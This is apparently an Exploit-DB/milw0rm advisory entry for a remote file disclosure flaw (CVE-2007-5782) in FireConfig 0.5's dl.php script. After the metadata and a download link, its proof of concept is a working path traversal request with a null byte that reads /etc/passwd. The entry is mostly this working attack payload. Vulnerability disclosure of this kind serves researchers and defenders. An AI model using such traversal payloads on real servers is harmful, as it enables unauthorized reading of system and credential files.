FireConfig 0.5 - 'dl.php' Remote File Disclosure
Author: GoLd_M
type: webapps
platform: php
port:
date_added: 2007-10-27
date_updated: 2016-10-20
verified: 1
codes: OSVDB-40645;CVE-2007-5782
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comfireconfig_v0.5.tar.gz
FireConfig v0.5 (dl.php file) Remote File Disclosure Vulnerability
http://heanet.dl.sourceforge.net/sourceforge/fireconfig/fireconfig_v0.5.tar.gz
POC :
/dl.php?file=../../../../../../etc/passwd%00
# milw0rm.com [2007-10-28]